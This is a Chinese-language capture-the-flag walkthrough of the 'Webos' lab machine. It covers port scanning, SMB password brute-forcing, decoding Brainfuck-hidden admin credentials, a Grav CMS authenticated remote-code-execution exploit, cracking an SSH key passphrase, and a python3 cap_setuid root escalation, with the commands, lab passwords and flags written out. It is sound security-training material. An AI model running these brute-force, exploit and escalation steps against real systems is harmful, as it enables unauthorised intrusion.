信息收集

服务探测

常规80端口，额外多个445的smb服务

❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.135  08:00:27:5f:a2:66       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fd:82:05       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.059 seconds (124.33 hosts/sec). 4 responded
❯ export ip=192.168.60.135
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.135:22
Open 192.168.60.135:80
Open 192.168.60.135:139
Open 192.168.60.135:445
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 14:40 CST
Initiating ARP Ping Scan at 14:40
Scanning 192.168.60.135 [1 port]
Completed ARP Ping Scan at 14:40, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:40
Completed Parallel DNS resolution of 1 host. at 14:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:40
Scanning 192.168.60.135 [4 ports]
Discovered open port 445/tcp on 192.168.60.135
Discovered open port 80/tcp on 192.168.60.135
Discovered open port 22/tcp on 192.168.60.135
Discovered open port 139/tcp on 192.168.60.135
Completed SYN Stealth Scan at 14:40, 0.05s elapsed (4 total ports)
Nmap scan report for 192.168.60.135
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-01-04 14:40:40 CST for 0s

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 64
80/tcp  open  http         syn-ack ttl 64
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64
MAC Address: 08:00:27:5F:A2:66 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

先看一下80端口有啥，好像有两层登录表单

在这不管输入啥都会跳转到/login第二个登入表单

我们可以观察到这个网站时基于Grav的CMS框架的

我尝试sql注入无果

随便google找到了有RCE漏洞，但是利用需要账户密码

gunzf0x/Grav-CMS-RCE-Authenticated：针对 Grav CMS（低于 1.7.45 的版本）的漏洞，允许经过身份验证的用户远程执行代码 - CVE-2024-28116

再次尝试在smb服务上找一下信息

然而并没有权限🤨

❯ smbclient -N -L  //192.168.60.135

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        webos           Disk      Archivo compartido en Samba
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
❯ smbclient -N  //192.168.60.135/webos
tree connect failed: NT_STATUS_ACCESS_DENIED
❯ smbclient -N  //192.168.60.135/nobody
tree connect failed: NT_STATUS_ACCESS_DENIED

爆破smb服务

无奈之下只能无脑爆破了，根据靶机名字、文件夹名字猜测用户名为webos

这里我不知道为什么hydra爆破smb爆的这慢，好久都出不来

换了medusa秒出

1 2	❯ medusa -h 192.168.60.135 -u webos -P /usr/share/wordlists/rockyou.txt -M smbnt ACCOUNT FOUND: [smbnt] Host: 192.168.60.135 User: webos Password: geraldine [SUCCESS (ADMIN$ - Share Unavailable)]

再次连接smb

❯ smbclient -U webos //192.168.60.135/webos
Password for [WORKGROUP\webos]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Jul 18 02:47:07 2024
  ..                                  D        0  Thu Jul 18 17:31:55 2024
  MamaÑema.txt                       N      245  Thu Jul 18 02:47:07 2024

                19480400 blocks of size 1024. 16306212 blocks available
smb: \> get MamaÑema.txt
getting file \MamaÑema.txt of size 245 as MamaÑema.txt (39.9 KiloBytes/sec) (average 39.9 KiloBytes/sec)
smb: \> quit
❯ cat MamaÑema.txt
++++++++++[>++++++++++>++++++++++>+++++++++++>+++++++++++>+++++++++++>++++++>++++++++>++++++++++>+++++++++++>+++++++++++>++++++++++>+++++++++++>+++++>++++++>++++<<<<<<<<<<<<<<<-]>---.>.>-.>-----.>.>--.>.>+.>++++.>-----.>-.>+.>++++.>---.>++.....

拿到一个binfuck编码后的文本

通过在线网站解密得到账户admin:Perico69*****

我们可以扫一下目录找到后台登录地址

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.135
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 317] [--> http://192.168.60.135/images/]
/home                 (Status: 200) [Size: 12282]
/login                (Status: 200) [Size: 13646]
/user                 (Status: 301) [Size: 315] [--> http://192.168.60.135/user/]
/assets               (Status: 301) [Size: 317] [--> http://192.168.60.135/assets/]
/admin                (Status: 200) [Size: 11127]
/bin                  (Status: 301) [Size: 314] [--> http://192.168.60.135/bin/]
/system               (Status: 301) [Size: 317] [--> http://192.168.60.135/system/]
/cache                (Status: 301) [Size: 316] [--> http://192.168.60.135/cache/]
/vendor               (Status: 301) [Size: 317] [--> http://192.168.60.135/vendor/]
/backup               (Status: 301) [Size: 317] [--> http://192.168.60.135/backup/]
/logs                 (Status: 301) [Size: 315] [--> http://192.168.60.135/logs/]
/forgot_password      (Status: 200) [Size: 11763]
/tmp                  (Status: 301) [Size: 314] [--> http://192.168.60.135/tmp/]
/http%3a              (Status: 200) [Size: 12282]
/**http%3a            (Status: 200) [Size: 12282]
/*http%3a             (Status: 200) [Size: 12282]
/user_profile         (Status: 200) [Size: 13653]
/%c0                  (Status: 200) [Size: 12282]
/server-status        (Status: 403) [Size: 279]
/%3frid%3d2671        (Status: 500) [Size: 258358]
/%cf                  (Status: 200) [Size: 12282]
/%cb                  (Status: 200) [Size: 12282]
/%ca                  (Status: 200) [Size: 12282]
/%cd                  (Status: 200) [Size: 12282]
/%d1                  (Status: 200) [Size: 12282]
/%d0                  (Status: 200) [Size: 12282]
/%d4                  (Status: 200) [Size: 12282]
/%d7                  (Status: 200) [Size: 12282]
/%d8                  (Status: 200) [Size: 12282]
/%d2                  (Status: 200) [Size: 12282]
/%cc                  (Status: 200) [Size: 12282]
/%c9                  (Status: 200) [Size: 12282]
/%c1                  (Status: 200) [Size: 12282]
/%c8                  (Status: 200) [Size: 12282]
/%d5                  (Status: 200) [Size: 12282]
/%d6                  (Status: 200) [Size: 12282]
/%d3                  (Status: 200) [Size: 12282]
/%ce                  (Status: 200) [Size: 12282]
/%c2                  (Status: 200) [Size: 12282]
/%c7                  (Status: 200) [Size: 12282]
/%c5                  (Status: 200) [Size: 12282]
/%c4                  (Status: 200) [Size: 12282]
/%c3                  (Status: 200) [Size: 12282]
/%c6                  (Status: 200) [Size: 12282]
/%d9                  (Status: 200) [Size: 12282]
/%de                  (Status: 200) [Size: 12282]
/%dd                  (Status: 200) [Size: 12282]
/%df                  (Status: 200) [Size: 12282]
/%db                  (Status: 200) [Size: 12282]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

在/admin使用密码登入到后台，可以看到当前版本是1.7.44

此版本有XSS漏洞，也可以利用上面的脚本低于要求版本

任意命令执行

尝试利用一下，不过脚本默认是会自动删除生成的文件，所以需要加一个参数--no-delete-file

❯ python3 Grav_CMS_RCE.py -t 192.168.60.135 -u 'admin' -p 'Perico69*****' -x 'id' --no-delete-file
[*] Attacking 'http://192.168.60.135:80'...
[*] Uploading payload...
[*] Executing payload...
[*] Payload uploaded. Visit 'http://192.168.60.135:80/b3bpro2uab' to see the command execution output

访问一下，可以正常执行

我们回到后台就可以看到生成了一个新的文件

不过不知道为什么shell弹不过来，只能手动修改这个id，慢慢测然后预览了

当我ls /opt的时候发现这个目录下有个私钥文件

所以直接改为cat /opt/id_rsa

用户提权

拿到私钥文件了

私钥加密了，爆破一下，拿到freestyle

❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=passwd
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
freestyle        (id_rsa)
1g 0:00:00:00 DONE (2025-01-04 17:09) 5.000g/s 5.000p/s 5.000c/s 5.000C/s freestyle
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

ssh登上去

❯ ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':
Linux TheHackersLabs-Webos 6.1.0-22-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.94-1 (2024-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 18 11:45:53 2024 from 192.168.18.19
webos@TheHackersLabs-Webos:~$ ls
python3  user.txt  webito
webos@TheHackersLabs-Webos:~$ cat user.txt
efca2461d0ccdf0ab78bfbbc93e1efe9  -

Root提权

再次信息收集

Linux 功能 - HackTricks — Linux Capabilities - HackTricks

发现家目录的python3 被赋予了cap_setuid权限，简单来说是可以利用python修改其UID

1
2
3

webos@TheHackersLabs-Webos:~$ /sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
/home/webos/python3 cap_setuid=ep

传统上，Linux 中的权限管理依赖于用户和组的身份，最具特权的用户是 root，具有系统上的所有权限。然而，这种方式存在一些问题，特别是当程序需要执行某些特权操作（如访问网络、操作文件系统等）时，它可能需要以 root 权限运行，这增加了安全风险。

Capabilities 允许将传统的 root 权限划分为多个小的、可控制的权限（即“能力”），并将这些权限分配给特定进程或程序，而不是让整个程序拥有 root 权限。

每个进程可以通过这些能力来执行特定的操作，而不需要拥有整个 root 权限。这样，即使某个程序被攻击者利用，攻击者也不会拥有完全的 root 权限，而是仅限于执行具有指定能力的操作，从而提高了系统的安全性。

webos@TheHackersLabs-Webos:~$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1001(webos) grupos=1001(webos),1002(webito)
# cd /root
# ls
root.txt
# cat root.txt
46510507fb8a261ee8cafee6ff6ad368  -